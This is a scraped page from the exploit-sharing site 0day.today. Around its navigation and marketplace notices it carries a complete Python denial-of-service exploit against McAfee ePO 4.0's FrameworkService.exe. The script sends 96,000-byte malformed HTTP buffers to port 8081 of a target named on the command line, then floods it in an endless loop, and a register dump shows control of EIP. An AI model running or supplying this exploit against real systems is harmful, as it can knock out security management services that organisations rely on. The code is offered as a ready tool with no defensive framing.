0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Mcafee EPO 4.0 FrameworkService.exe Remote Denial of Service Exploit
==================================================================== Mcafee EPO 4.0 FrameworkService.exe Remote Denial of Service Exploit ==================================================================== #!/usr/bin/python # Mcafee EPO 4.0 (and others) FrameworkService.exe DOS # More than meets the eye # Discovered and coded by Mati Aharoni # muts..at..offensive-security.com # EAX 00840C30 # ECX 00837830 # EDX 01EACF18 # EBX 00004000 # ESP 01EAFF04 # EBP 01EAFF38 # ESI 00837830 # EDI 643AC780 naCmnLib.CnaLogger::AddMessageA # EIP 42424242 import socket import os import sys from time import sleep expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect ( ( sys.argv[1], 8081 ) ) buff="B"*96000+" HTTP/1.1\r\n" req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n" expl.send (req) #data=expl.recv(1024) #print data expl.close() expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect ( ( sys.argv[1], 8081 ) ) buff="B"*96000+" HTTP/1.1\r\n" req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n" expl.send (req) #data=expl.recv(1024) #print data expl.close() expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect ( ( sys.argv[1], 8081 ) ) buff="B"*96000+" HTTP/1.1\r\n" req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n" expl.send (req) #data=expl.recv(1024) #print data expl.close() while 1: expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect ( ( sys.argv[1], 8081 ) ) buff="B"*243 req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n' expl.send (req) expl.send (req) expl.send (req) expl.send (req) expl.send (req) expl.send (req) expl.send (req) expl.send (req) expl.send (req) expl.send (req) expl.send (req) expl.send (req) data=expl.recv(1024) print data expl.close() sleep(0.1) # 0day.today [2024-11-15] #